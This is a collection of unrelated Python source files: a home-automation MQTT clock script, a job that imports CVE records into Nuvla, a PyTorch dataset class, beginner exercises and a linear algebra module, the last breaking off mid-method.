<gh_stars>0 #!/usr/bin/python3 """ Diyhas clock, motion detector and piezo alarm """ # MIT License # # Copyright (c) 2019 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import time import datetime import socket import queue import logging import logging.config import paho.mqtt.client as mqtt from Adafruit_GPIO import GPIO from Adafruit_LED_Backpack import BicolorMatrix8x8 import ledclock import led8x8controller logging.config.fileConfig(fname='/home/an/diyclock/logging.ini', disable_existing_loggers=False) # Get the logger specified in the file LOGGER = logging.getLogger("diyclock") LOGGER.info('Application started') class Configuration: """ motion_topic to avoid global PEP8 """ def __init__(self): """ create two topics for this application """ self.setup_topic = "diy/" + socket.gethostname() + "/setup" self.motion_topic = "" self.pir_pin = 24 self.piezo_pin = 4 self.mqtt_ip = "192.168.1.53" self.matrix8x8_addr = 0x70 def set(self, topic): """ the motion topic is passed to the app at startup """ self.motion_topic = topic def get_setup(self,): """ the motion topic dynamically set """ return self.setup_topic def get_motion(self,): """ the motion topic dynamically set """ return self.motion_topic CONFIG = Configuration() class MotionController: """ motion detection device driver """ def __init__(self, pin): """ capture interrupts """ self.gpio = GPIO.get_platform_gpio() self.queue = queue.Queue() self.pin = pin self.gpio.setup(self.pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) self.last_reading = 0 def pir_interrupt_handler(self, gpio): """ motion interrupt handler sends 1 or 0 to queue """ state = self.gpio.input(gpio) if state == 1: message = "1" else: message = "0" if state != self.last_reading: self.queue.put(message) self.last_reading = state def enable(self,): """ enable the interrupt handler """ self.gpio.add_event_detect(self.pin, GPIO.RISING, callback=self.pir_interrupt_handler) def detected(self,): """ has motion been detected """ return not self.queue.empty() def get_motion(self,): """ return the last value either 1 or 0 """ return self.queue.get(False) def wait_for_motion(self,): """ wait for the next interrupt 1 or 0 """ return self.queue.get(True) class AlarmController: """ alarm piezo device driver """ def __init__(self, pin): """ control output to pin 4 """ self.gpio = GPIO.get_platform_gpio() self.pin = pin self.gpio.setup(self.pin, GPIO.OUT) self.gpio.output(self.pin, GPIO.LOW) def sound_alarm(self, turn_on): """ turn power to piexo on or off """ if turn_on: self.gpio.output(self.pin, GPIO.HIGH) else: self.gpio.output(self.pin, GPIO.LOW) def reset(self,): """ turn power to piexo off """ self.gpio.output(self.pin, GPIO.LOW) CLOCK = ledclock.LedClock() CLOCK.run() DISPLAY = BicolorMatrix8x8.BicolorMatrix8x8(address=CONFIG.matrix8x8_addr) DISPLAY.begin() MATRIX = led8x8controller.Led8x8Controller(DISPLAY) MATRIX.run() ALARM = AlarmController(CONFIG.piezo_pin) ALARM.sound_alarm(False) class TimedEvents: """ timed event handler """ def __init__(self, day, night): """ initialize night,day and light status """ if night < day: raise "NIGHT < DAY" self.night = night self.day = day self.lights_are_on = True def control_lights(self, switch): """ dim lights at night or turn up during the day """ if switch == "Turn On": CLOCK.set_brightness(12) MATRIX.set_state(led8x8controller.DEMO_STATE) self.lights_are_on = True else: CLOCK.set_brightness(0) MATRIX.set_state(led8x8controller.IDLE_STATE) self.lights_are_on = False def check_for_timed_events(self,): """ turn down displays at night """ now = datetime.datetime.now().time() if now <= self.day: if self.lights_are_on: self.control_lights("Turn Off") elif now >= self.night: if self.lights_are_on: self.control_lights("Turn Off") else: if not self.lights_are_on: self.control_lights("Turn On") DAY_DEFAULT = datetime.time(6, 1) NIGHT_DEFAULT = datetime.time(20, 1) TIMER = TimedEvents(DAY_DEFAULT, NIGHT_DEFAULT) def system_message(msg): """ process system messages""" #pylint: disable=too-many-branches #LOGGER.info(msg.topic+" "+msg.payload.decode('utf-8')) if msg.topic == 'diy/system/fire': if msg.payload == b'ON': MATRIX.set_mode(led8x8controller.FIRE_MODE) ALARM.sound_alarm(True) else: MATRIX.set_mode(led8x8controller.FIBONACCI_MODE, True) ALARM.sound_alarm(False) elif msg.topic == 'diy/system/panic': if msg.payload == b'ON': MATRIX.set_mode(led8x8controller.PANIC_MODE) ALARM.sound_alarm(True) else: MATRIX.set_mode(led8x8controller.FIBONACCI_MODE, True) ALARM.sound_alarm(False) elif msg.topic == 'diy/system/who': if msg.payload == b'ON': CLOCK.set_mode(ledclock.WHO_MODE) else: CLOCK.set_mode(ledclock.TIME_MODE) elif msg.topic == 'diy/system/demo': if msg.payload == b'ON': MATRIX.set_state(led8x8controller.DEMO_STATE) else: MATRIX.set_state(led8x8controller.IDLE_STATE) elif msg.topic == 'diy/system/security': if msg.payload == b'ON': MATRIX.set_state(led8x8controller.SECURITY_STATE) else: MATRIX.set_state(led8x8controller.DEMO_STATE) elif msg.topic == 'diy/system/silent': if msg.payload == b'ON': MATRIX.set_state(led8x8controller.IDLE_STATE) else: MATRIX.set_state(led8x8controller.DEMO_STATE) elif msg.topic == CONFIG.get_setup(): topic = msg.payload.decode('utf-8') + "/motion" CONFIG.set(topic) # use a dispatch model for the subscriptions TOPIC_DISPATCH_DICTIONARY = { "diy/system/demo": {"method":system_message}, "diy/system/fire": {"method":system_message}, "diy/system/panic": {"method":system_message}, "diy/system/security": {"method":system_message}, "diy/system/silent": {"method":system_message}, "diy/system/who": {"method":system_message}, CONFIG.get_setup(): {"method":system_message} } # The callback for when the client receives a CONNACK response from the server. # def on_connect(client, userdata, flags, rc): def on_connect(client, userdata, flags, rcdata): #pylint: disable=unused-argument """ Subscribing in on_connect() means that if we lose the connection and reconnect then subscriptions will be renewed. """ client.subscribe("diy/system/demo", 1) client.subscribe("diy/system/fire", 1) client.subscribe("diy/system/panic", 1) client.subscribe("diy/system/security", 1) client.subscribe("diy/system/silent", 1) client.subscribe("diy/system/who", 1) client.subscribe(CONFIG.get_setup(), 1) client.subscribe("diy/+/+/motion", 1) def on_disconnect(client, userdata, rcdata): #pylint: disable=unused-argument """ disconnect detected """ LOGGER.info("Disconnected") client.connected_flag = False client.disconnect_flag = True # The callback for when a PUBLISH message is received from the server. # def on_message(client, userdata, msg): def on_message(client, userdata, msg): #pylint: disable=unused-argument """ dispatch to the appropriate MQTT topic handler """ if "motion" in msg.topic: MATRIX.update_motion(msg.topic) else: TOPIC_DISPATCH_DICTIONARY[msg.topic]["method"](msg) MOTION = MotionController(CONFIG.pir_pin) MOTION.enable() if __name__ == '__main__': #Start utility threads, setup MQTT handlers then wait for timed events CLIENT = mqtt.Client() CLIENT.on_connect = on_connect CLIENT.on_disconnect = on_disconnect CLIENT.on_message = on_message CLIENT.connect(CONFIG.mqtt_ip, 1883, 60) CLIENT.loop_start() # give network time to startup - hack? time.sleep(1.0) # loop forever checking for interrupts or timed events while True: time.sleep(1.0) if MOTION.detected(): VALUE = MOTION.get_motion() TOPIC = CONFIG.get_motion() CLIENT.publish(TOPIC, VALUE, 0, True) # print("bil: motion detected") TIMER.check_for_timed_events()
2.078125
2
code/src/nuvla/job/actions/vulnerabilities_database.py
nuvla/job-engine
3
12789713
<reponame>nuvla/job-engine<filename>code/src/nuvla/job/actions/vulnerabilities_database.py # -*- coding: utf-8 -*- from ..actions import action import logging import requests import gzip import json import io from nuvla.api import NuvlaError @action('update_vulnerabilities_database') class VulnerabilitiesDatabaseJob(object): def __init__(self, _, job): self.job = job self.api = job.api config = self.api.get('configuration/nuvla') self.external_vulnerabilities_db = config.data.get('external-vulnerabilities-db') self.github_api = 'https://api.github.com' @staticmethod def download_db(url): external_db = requests.get(url) trimmed_url = url.split('?')[0] # get rid of any url parameters if trimmed_url.endswith('.gz'): # gzip file db_content = io.BytesIO(external_db.content) db_content_json = json.loads(gzip.GzipFile(fileobj=db_content, mode='rb').read()) else: # assume it is a JSON file db_content_json = external_db.json() return db_content_json def get_last_db_timestamps(self): nuvla_db_last_update = None nuvla_vulns = self.api.search('vulnerability', orderby='modified:desc', last=1).resources if len(nuvla_vulns) > 0: nuvla_db_last_update = nuvla_vulns[0].data.get('updated') # instead of naively always downloading to DB to check the last timestamp, we can try to infer whether the DB # is in GitHub, and find the timestamp of the last commit and a pre-condition if self.external_vulnerabilities_db.startswith('https://github.com/'): gh_account_repo = self.external_vulnerabilities_db.lstrip('https://github.com/').rstrip('.git') try: github_account, repo = gh_account_repo.split('/')[0:2] github_last_commit = requests.get(f'{self.github_api}/repos/{github_account}/{repo}/commits/main') if github_last_commit.status_code == 422: # try legacy master branch instead github_last_commit = requests.get(f'{self.github_api}/repos/{github_account}/{repo}/commits/master') if github_last_commit.status_code == 200 and isinstance(github_last_commit.json(), dict): last_commit_date = str(github_last_commit.json()['commit']. get('committer', github_last_commit.json()['commit'].get('author'))['date']) return nuvla_db_last_update, last_commit_date, None except (IndexError, KeyError): logging.exception("Could not infer last date of DB update from GitHub API") pass # if we got here, it's because we couldn't yet get the last update timestamp from the external source # so let's just download the given DB and get the timestamp from its content db_content_json = self.download_db(self.external_vulnerabilities_db) try: # even though the db_content_json might not be needed (in case there are no updates), # we cache it anyway to avoid downloading it again later on return nuvla_db_last_update, db_content_json['CVE_data_timestamp'], db_content_json except KeyError: logging.exception(f"Could not parse the external vulnerability DB provided at {self.external_vulnerabilities_db}") return nuvla_db_last_update, None, None def get_nuvla_vulnerabilities_list(self): # we need to paginate, so let's initialize the list # 10k records at the time vulns = [] aux = self.api.search('vulnerability', orderby='updated:desc', select="id,name,modified,updated").resources vulns += aux while len(aux) == 10000: page_filter = aux[-1].data.get('updated') # when we get a page with less than 10k resources, then it's the last one aux = self.api.search('vulnerability', orderby='updated:desc', select="id,name,modified,updated", filter=f'updated<"{page_filter}"').resources vulns += aux return vulns def update_vulnerabilities_database(self): logging.info(f'Updating DB of vulnerabilities in Nuvla, from {self.external_vulnerabilities_db}') self.job.set_progress(10) nuvla_db_last_update, external_db_last_update, db_content = self.get_last_db_timestamps() self.job.set_progress(20) if not external_db_last_update: # if we can't get the last update time from the external DB, then we can't update the Nuvla DB self.job.update_job(status_message="Can not lookup external DB. Nothing to do...") self.job.set_progress(100) return 0 logging.info("Last Nuvla DB update: %s" % nuvla_db_last_update) logging.info("Last external DB update: %s" % external_db_last_update) new_vuln = 0 updated_vuln = 0 self.job.set_progress(40) if not db_content: db_content = self.download_db(self.external_vulnerabilities_db) # get all vulnerability IDs from Nuvla nuvla_vulnerabilities = self.get_nuvla_vulnerabilities_list() nuvla_vuln_res_id_map = {} for res in nuvla_vulnerabilities: nuvla_vuln_res_id_map[res.data.get('name', '')] = {'nuvla_id': res.id, 'modified': res.data.get('modified', '1970-01-01T00:00:00Z')} self.job.set_progress(60) try: cve_items = db_content['CVE_Items'] logging.info("Vulnerabilities in the Nuvla DB: %s" % len(nuvla_vuln_res_id_map)) logging.info("Vulnerabilities in external DB: %s" % len(cve_items)) for cve_item in cve_items: try: cve = cve_item['cve'] cve_modified = cve_item.get('lastModifiedDate') if not cve_modified: # if we can't know when was the vulnerability updated, then better not to update anything continue cve_id = cve['CVE_data_meta']['ID'] # to save API calls, let's do selective updates, by only updating the Nuvla vulnerabilities # that have in fact been updated upstream (instead of the full collection) if not nuvla_db_last_update or \ cve_id not in nuvla_vuln_res_id_map or \ cve_modified > nuvla_vuln_res_id_map[cve_id]['modified']: # then it needs updating/creating cve_description = cve['description']['description_data'][0]['value'] cve_ref = cve['references']['reference_data'][0]['url'] cve_score = cve_item['impact']['baseMetricV3']['cvssV3'].get('baseScore') cve_severity = cve_item['impact']['baseMetricV3']['cvssV3'].get('baseSeverity', 'NONE') cve_published = cve_item['publishedDate'] payload = { 'name': cve_id, 'description': cve_description, 'reference': cve_ref, 'published': cve_published, 'modified': cve_modified, "acl": { "view-data": [ "group/nuvla-user" ], "view-meta": [ "group/nuvla-user" ], "view-acl": [ "group/nuvla-user" ], "owners": [ "group/nuvla-admin" ] }, } if cve_score: payload['score'] = cve_score payload['severity'] = cve_severity if cve_severity else "NONE" if cve_id in nuvla_vuln_res_id_map: # PUT try: self.api.edit(nuvla_vuln_res_id_map[cve_id]['nuvla_id'], payload) updated_vuln += 1 except NuvlaError: logging.exception(f"Couldn't PUT existing vulnerability {payload['name']}") else: # POST try: self.api.add('vulnerability', payload) new_vuln += 1 except NuvlaError: logging.exception(f"Couldn't POST new vulnerability {payload['name']}") except KeyError: continue except KeyError: logging.exception("External DB is missing expected fields") raise msg = f"Summary: modified={updated_vuln} / new={new_vuln}" logging.info(msg) self.job.set_progress(100) self.job.set_status_message(msg) return 0 def do_work(self): return self.update_vulnerabilities_database()
2.40625
2
vilmedic/datasets/ImSeqLabel.py
jbdel/vilmedic
15
12789714
import torch from torch.utils.data import Dataset from .base.LabelDataset import LabelDataset from .ImSeq import ImSeq class ImSeqLabel(Dataset): def __init__(self, seq, label, image, split, ckpt_dir, **kwargs): self.split = split self.imgseq = ImSeq(seq, image, split=split, ckpt_dir=ckpt_dir) self.label = LabelDataset(**label, split=split, ckpt_dir=ckpt_dir) assert len(self.imgseq) == len(self.label), str(len(self.imgseq)) + 'vs ' + str(len(self.label)) # For decoding, if needed self.tokenizer = self.imgseq.seq.tokenizer self.tokenizer_max_len = self.imgseq.seq.tokenizer_max_len # For tokenizing self.tokenizer_args = self.imgseq.seq.tokenizer_args def __getitem__(self, index): return {**self.imgseq.__getitem__(index), **self.label.__getitem__(index)} def get_collate_fn(self): def collate_fn(batch): collated = {**self.imgseq.get_collate_fn()(batch), **self.label.get_collate_fn()(batch)} return collated return collate_fn def __len__(self): return len(self.label) def __repr__(self): return "ImSeqLabel\n" + str(self.imgseq) + '\n' + str(self.label)
2.515625
3
students/admin.py
wjarczak/WSB-CRUD
0
12789715
<gh_stars>0 from django.contrib import admin from .models import Student, Representative admin.site.register(Student) admin.site.register(Representative)
1.296875
1
shuffle.py
asix7/RandomScripts
0
12789716
# Author: <NAME> 2016 # Practice random shuffles, and see their effectiveness import random import math list = ["Hola", "no", "estoy", "aqui", "Javi", "assca"] # Inplace shuffle def shuffle(list): for index in range(0, len(list)): new_index = random.randint(0, len(list) - 1) var = list[index] list[index] = list[new_index] list[new_index] = var return list # Stract form list shuffle def shuffle2(list): new_list = [] while len(list) > 0: index = random.randint(0, len(list) - 1) new_list.append(list[index]) list.pop(index) list = new_list return list # Count ocurrance of each combination dic = {} n = 10000 for i in range(0,n): list = shuffle(list) if str(list) in dic.keys(): dic[str(list)] += 1 else: dic[str(list)] = 1 # Calculate the mean sum = 0 for combination in dic.keys(): sum += dic[combination] print (dic[combination]) mean = 1.0*sum/len(dic.keys()) print ("Mean:") print (mean) # Calculate Standard deviation coeficient = 0 for combination in dic.keys(): coeficient += (mean - dic[combination]) * (mean - dic[combination]) standard_deviation = math.sqrt(coeficient/n) print (standard_deviation)
3.984375
4
03-Python/2/Activities/12-Ins_Functions/Solved/functions.py
madhavinamballa/datascience_Berkely
0
12789717
# Define the function and tell it to print "Hello!" when called def printHello(): print(f"Hello!") # Call the function within the application to ensure the code is run printHello() # -------------# # Functions that take in and use parameters can also be defined def printName(name): print("Hello " + name + "!") # When calling a function with a parameter, a parameter must be passed into the function printName("<NAME>") # -------------# # The prime use case for functions is in being able to run the same code for different values listOne = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] listTwo = [11, 12, 13, 14, 15] def listInformation(simpleList): print(f"The values within the list are...") for value in simpleList: print(value) print("The length of this list is... " + str(len(simpleList))) listInformation(listOne) listInformation(listTwo)
4.59375
5
invert_dict.py
brupoon/mustachedNinja
0
12789718
#invert_dict from 11.4 def invert_dict(d): invert = dict() for key in d: value = d[key] if value not in invert: invert[value] = [key] else: invert[value].append(key) return invert #using setdefault, write a more concise version of invert_dict def invert_dict_set(d): invert = dict() for key in d: inverter = invert.setdefault(d[key], []).append(key) return invert def main(): dict1 = {'one': 1, 'two': 2, 'notthree': 1} dict1_invert = invert_dict(dict1) dict1_invert_set = invert_dict_set(dict1) print("dict1: ", dict1) print("dict1_invert: ", dict1_invert) print("dict1_invert_set: ", dict1_invert_set) if __name__ == '__main__': main()
4.5
4
Chapter09/findword.py
LuisPereda/Learning_Python
0
12789719
<filename>Chapter09/findword.py word = raw_input("Enter the word ") word = word.lower() file_txt = open("batman.txt", "r") count = 0 for each in file_txt: if word in each.lower(): count = count+1 print "The ", word ," occured ",count, " times"
3.796875
4
dlfairness/original_code/FairALM/Experiments-ChestXRay/random_sample_dataset.py
lin-tan/fairness-variance
0
12789720
<reponame>lin-tan/fairness-variance import shutil, random, os from pathlib import Path from PIL import Image dir_path = Path('./raw_data') dest_path = Path('./tuberculosis-data-processed/') fn_list = list(dir_path.iterdir()) test_set = random.sample(fn_list, int(len(fn_list) * 0.25)) # Sample 25% train_dir = Path(dest_path, 'train') test_dir = Path(dest_path, 'test') train_dir.mkdir(exist_ok=True, parents=True) test_dir.mkdir(exist_ok=True, parents=True) for fn in fn_list: image = Image.open(fn).resize((128, 128)).convert('L') if fn in test_set: save_path = Path(test_dir, fn.name) else: save_path = Path(train_dir, fn.name) image.save(save_path)
2.40625
2
src/avmath/algebra.py
ballandt/Evmath
1
12789721
<reponame>ballandt/Evmath<gh_stars>1-10 """AVMATH ALGEBRA AdVanced math algebra submodule containing linear algebra features tuples, vectors, matrices and systems of linear equations. """ import copy import logging from typing import Union, Optional, List from . import ArgumentError, DimensionError, REAL, Fraction, sin, arccos,\ _check_types __all__ = ["Tuple", "Structure", "Matrix", "Vector", "SLE"] class GeometricalError(Exception): """Raised geometrical order cannot be executed.""" def __init__(self, arg): self.arg = arg def __str__(self): return self.arg class MatrixError(Exception): """Raised if matrix operations fail due to inappropriate matrices.""" def __init__(self, issue): self.arg = issue def __str__(self): return self.arg class GeometricalWarning: """Raised if shape without opt="flat" is called, but flat returns 'False'. Program does not get interrupted. Use 'GeometricalWarning.disable_warning()' to ignore warning. """ __warning = True def __init__(self, arg): if GeometricalWarning.__warning: logging.warning(arg) else: pass @classmethod def disable(cls): """Function to allow to permanently disable GeometricalWarning in case the calculation are too inexact.""" GeometricalWarning.__warning = False class Tuple: """Algebraic tuple. Can also be interpreted as point in the coordinate system. """ def __init__(self, *args: REAL | list | tuple | 'Vector'): _check_types(args, int, float, list, tuple, Fraction, Vector) if type(args[0]) in (list, tuple) and len(args) == 1: self._value = list(args[0]) else: self._value = list(args) def __iter__(self): """Returns iterator to convert tuple to iterable object.""" for ele in self._value: yield ele def __getitem__(self, item): """Returns value of 'item's dimension.""" return self._value[item] def __repr__(self) -> str: """Returns string representation.""" return str(tuple(self._value)) def __eq__(self, other: 'Tuple') -> bool: """Checks if elements are equal.""" return self._value == other._value def __len__(self) -> int: """Returns the length or dimension of a tuple""" return len(self._value) dim = __len__ def __neg__(self): """Returns negative tuple.""" return self * -1 def __add__(self, other: 'Tuple') -> 'Tuple': """Adds two tuples: a + b = (a_1 + b_1, a_2 + b_2, ... , a_n + b_n) """ if not Tuple.dim_check(self, other): raise DimensionError(other.dim(), self.dim()) result = [] for i in range(self.dim()): result.append(self[i] + other[i]) return Tuple(*tuple(result)) def __sub__(self, other: 'Tuple') -> 'Tuple': """Reversed addition: a - b = a + (-b) """ return self + -other def __mul__(self, other: REAL): """Scalar multiplication: r * a = (r*a_1, r*a_2, ... , r*a_n) (a e R^n, r e R) """ result = [] for ele in self._value: result.append(ele * other) return Tuple(*tuple(result)) __rmul__ = __mul__ def __truediv__(self, other: REAL) -> 'Tuple': """Division. Tuple by number only.Though mathematically incorrect gives the possibility to return fractions for correct division. """ ret_list = [] for ele in self: if type(ele) == Fraction: ret_list.append(ele / other) else: ret_list.append(Fraction(ele, other)) return Tuple(ret_list) def append(self, value: REAL): """Adds value to Tuple.""" ret_value = copy.deepcopy(self._value) ret_value.append(value) return Tuple(ret_value) def no_fractions(self) -> 'Tuple': """Returns Tuple that does not contain Fractions. Converts Fractions to float. """ return Tuple([float(ele) for ele in self]) @staticmethod def dim_check(*args) -> bool: """Checks if arguments have the same amount of dimensions.""" dimension = args[0].dim() for ele in args: if not ele.dim() == dimension: return False return True class Vector(Tuple): """Vector.""" def __init__(self, *args: REAL | 'Tuple', begin: Optional['Tuple'] = None, end: Optional['Tuple'] = None): """Takes whether number arguments, vectorizes Tuple or creates vector between two Tuples. For number insert: Vector(a_1, a_2, a_3) for ┌ a_1 ┐ | a_2 | or (a_1, a_2, a_3) └ a_3 ┘ For vectorization: Vector(Tuple(a_1, a_2, a_3)) for ┌ a_1 ┐ | a_2 | or (a_1, a_2, a_3) └ a_3 ┘ For linking of points: Vector(begin=Tuple(a_1, a_2, a_3), end=Tuple(b_1, b_2, b_3)) for ┌ b_1 - a_1 ┐ | b_2 - a_2 | or (b_1 - a_1, b_2 - a_2, b_3 - a_3) └ b_3 - a_3 ┘ """ if not begin and type(args[0]) != Tuple: super().__init__(*args) elif not begin and type(args[0]) == Tuple: super().__init__(*tuple(args[0])) elif begin and end: _check_types((begin, end), Tuple) if begin.dim() != end.dim(): raise DimensionError(end.dim(), begin.dim()) super().__init__( *tuple([end[i] - begin[i] for i in range(begin.dim())]) ) def __abs__(self) -> float: """Returns absolute of a vector. Insert abs(Vector(a_1, a_2, [...], a_n)) For ________________________________ \\/ (a_1)^2 + (a_2)^2 + ... + (a_n)^2 """ res = 0 for i in range(self.dim()): res += self._value[i] ** 2 self.abs = res ** 0.5 return self.abs def __add__(self, other: 'Vector') -> 'Vector': """Adds two tuples: a + b = (a_1 + b_1, a_2 + b_2, ... , a_n + b_n) """ if not Vector.dim_check(self, other): raise DimensionError(other.dim(), self.dim()) result = [] for i in range(self.dim()): result.append(self[i] + other[i]) return Vector(*tuple(result)) def __sub__(self, other: 'Vector') -> 'Vector': """Reversed addition: a - b = a + (-b) """ return self + -other def __mul__(self, other: REAL | 'Vector') -> REAL | 'Vector': """Either scalar product of two vectors or scalar multiplication of scalar and vector. Insert Vector(a_1, a_2, [...], a_n) * Vector(b_1, b_2, [...], b_n) For (a_1, a_2, ..., a_n) * (b_1, b_2, ..., b_n) = a_1 b_1 + a_2 b_2 + ... + a_n b_n """ if type(other) != Vector: return Vector(Tuple(*tuple(self)) * other) if not Vector.dim_check(self, other): raise DimensionError(self.dim(), other.dim()) res = 0 for i in range(self.dim()): res += self[i] * other[i] return res __rmul__ = __mul__ def __truediv__(self, other: REAL) -> 'Vector': """Division. Vector by number only.Though mathematically incorrect gives the possibility to return fractions for correct division. """ ret_list = [] for e in self: if type(e) == Fraction: ret_list.append(e / other) else: ret_list.append(Fraction(e, other)) return Vector(Tuple(ret_list)) def __pow__(self, power: int) -> REAL | 'Vector': """Returns result of power times scalar multiplied vector. Power 0 returns unit-vector. Insert a = Vector(a_1, a_2, [...], a_n) a**p for a * a * ... * a p times """ _check_types((power,), int) if power == 0: return self.unit() res = 1 for i in range(power): res *= self return res def cross(self, other: 'Vector') -> 'Vector': """Vector multiplication. Only 3 dimensions supported. Insert Vector(a_1, a_2, a_3).cross(Vector(b_1, b_2, b_3)) For (a_1, a_2, a_3) x (b_1, b_2, b_3) = (a_2 b_3 - a_3 b_2, a_1 b_1 - a_1 b_3, a_1 b_2 - a_2 b_1) """ if self.dim() != 3: raise DimensionError(self.dim(), 3) elif other.dim() != 3: raise DimensionError(other.dim(), 3) res = [0, 0, 0] res[0] = (self[1] * other[2]) - (self[2] * other[1]) res[1] = (self[2] * other[0]) - (self[0] * other[2]) res[2] = (self[0] * other[1]) - (self[1] * other[0]) return Vector(*tuple(res)) def unit(self) -> 'Vector': """Returns vector with absolute 1 and same direction as self. Insert Vector(a_1, a_2, [...], a_n).unit() For a / |a|""" if abs(self) == 0: raise GeometricalError("Vector with absolute 0 has no unit vector") else: res = self * (1 / abs(self)) return res def leading_zeros(self) -> int: """Returns number of leading zeros of a vector. Especially used for matrix ref. """ leading_0 = 0 for ele in self._value: if ele == 0: leading_0 += 1 else: break return leading_0 def no_fractions(self) -> 'Vector': """Returns Vector that does not contain Fractions. Converts Fractions to float. """ return Vector(*tuple([float(e) for e in self])) @staticmethod def spat(u: 'Vector', v: 'Vector', w: 'Vector') -> float: """Returns spat volume. Insert Vector.spat(Vector(a_1, a_2, a_3), Vector(b_1, b_2, b_3), Vector(c_1, c_2, c_3)) For (a x b) * c""" return (u.cross(v)) * w @staticmethod def angle(u: 'Vector', v: 'Vector') -> float: """Returns angle between two vectors. Insert Vector.angle(Vector(a_1, [...], a_n), Vector(b_1, [...], b_n)) For (a_1, ..., a_n) (b_1, ..., b_n) arccos(-------------------------------) = phi (1 < n < 4) |a| * |b| """ if not Vector.dim_check(u, v): raise DimensionError(v.dim(), u.dim()) if u.dim() not in (2, 3): raise DimensionError(u.dim(), "2 or 3") angle = arccos(u * v / (abs(u) * abs(v))) return angle class Structure: """Point structure""" def __init__(self, *args: 'Tuple'): """Insert the edges of the structure.""" _check_types(args, Tuple) if not Tuple.dim_check(*args): raise DimensionError( other="Tuples have different amount of dimensions." ) if args[0].dim() > 3: raise DimensionError(other="Tuples must have 2 or 3 dimensions.") self.points = args if self.points[0].dim() == 2: self.points = [e.append(0) for e in self.points] self.vectors = [Vector(begin=self.points[-1], end=self.points[0])] for i in range(1, len(self.points)): self.vectors.append( Vector(begin=self.points[i - 1], end=self.points[i]) ) def flat(self) -> bool: """Returns 'True' if the points are in a three-dimensional area.""" if Tuple.dim_check(*self.points) and self.points[1].dim() == 2: return True unitvector = (self.vectors[0].cross(self.vectors[-1])).unit() for i in range(len(self.vectors) - 1): if (self.vectors[i].cross(self.vectors[i+1])).unit() != unitvector: return False return True def circumference(self) -> float: """Returns the circumference of the area opened by any amount of points. """ u = 0 for e in self.vectors: u += abs(e) return u def area(self, opt: str = None): """Returns area opened by any amount of vectors.""" area = Vector(0, 0, 0) if opt == "flat": if not self.flat(): raise GeometricalError("No flat area found.") if not self.flat(): GeometricalWarning("Area does not seem to be flat.") for i in range(len(self.points) - 1): abv = Vector(self.points[i] - self.points[0]) acv = Vector(self.points[i+1] - self.points[0]) area += abv.cross(acv) * 0.5 return abs(area) @staticmethod def triangulate(p: 'Tuple', q: 'Tuple', r: 'Tuple') -> float: """Returns area between three points.""" abv = Vector(begin=p, end=q) acv = Vector(begin=p, end=r) c = abs(abv) b = abs(acv) phi = Vector.angle(abv, acv) area = 0.5 * b * c * (sin(phi)) return area class Matrix(Tuple): """Mathematical matrix""" def __init__(self, *args: tuple | list | Vector): """Initializes the matrix. Enter a list for each row. insert Matrix([a_11, a_12, a_13], [a_21, a_22, a_23], [a_31, a_32, a_33]) for ┌ a_11 a_12 a_13 ┐ | a_21 a_22 a_23 | └ a_31 a_32 a_33 ┘ """ if type(args[0]) == Vector and len(args) == 1: value = [] for e in args[0]._value: value.append([e]) super().__init__(*value) else: value = list(args) for e in value: if not len(value[0]) == len(e): raise ArgumentError(e, f"row with {len(args[0])} members") _check_types(e, int, float, Fraction) super().__init__(*tuple(args)) def __repr__(self) -> str: """Prints matrix in an understandable view.""" ret_str = "\n" if self.size()[0] == 1: ret_str += "[" for e in self[0]: ret_str += 2 * " " + str(e) ret_str += 2 * " " + "]" return ret_str longest_element_list = list(map(str, self[0])) for i in range(1, self.size()[0]): for j in range(self.size()[1]): if len(str(self[i][j])) > len(longest_element_list[j]): longest_element_list[j] = str(self[i][j]) digits_list = list(map(len, longest_element_list)) b_element = sorted(digits_list)[-1] if b_element < 3: distance = 1 elif b_element < 8: distance = 2 else: distance = 3 for i in range(self.size()[0]): if i == 0: ret_str += "┌" + distance * " " elif i == self.size()[0] - 1: ret_str += "└" + distance * " " else: ret_str += "|" + distance * " " for j in range(self.size()[1]): ret_str += str(self[i][j]) ret_str += ((digits_list[j]-len(str(self[i][j]))+distance)*" ") if i == 0: ret_str += "┐" elif i == self.size()[0] - 1: ret_str += "┘" else: ret_str += "|" ret_str += "\n" return ret_str def __round__(self, n: int = None) -> 'Matrix': """Returns matrix with rounded values.""" ret_mat = copy.deepcopy(self) for i in range(self.size()[0]): for j in range(self.size()[1]): ret_mat._value[i][j] = round(ret_mat._value[i][j], n) return ret_mat def __neg__(self) -> 'Matrix': """Returns negative matrix.""" args = [] for i in range(self.size()[0]): args.append([]) for j in range(self.size()[1]): args[i].append(self[i][j] * -1) return Matrix(*tuple(args)) def __add__(self, other: 'Matrix') -> 'Matrix': """Adds two matrices.""" if type(other) != Matrix: raise ArgumentError(type(other), Matrix) elif self.size() != other.size(): raise ArgumentError("matrix with size " + str(other.size()), "matrix with size" + str(self.size())) args = [] for i in range(self.size()[0]): args.append([]) for j in range(self.size()[1]): args[i].append(self[i][j] + other[i][j]) return Matrix(*tuple(args)) def __sub__(self, other: 'Matrix') -> 'Matrix': """Subtracts a matrix from another.""" return self + -other def __mul__(self, other: REAL | 'Vector' | 'Matrix')\ -> Union['Matrix', 'Vector']: """Multiplies two matrices.""" if type(other) in (int, float): args = [] for i in range(self.size()[0]): args.append([]) for e in self[i]: args[i].append(e * other) return Matrix(*tuple(args)) elif type(other) == Vector: if self.size()[1] != other.dim(): raise MatrixError(f"Vector with size {other.dim()} cannot " f"be multiplied by matrix with " f"size {self.size()}") v_matrix = Matrix(other) ret_mat = self * v_matrix args = () for e in ret_mat._value: args += (e[0],) return 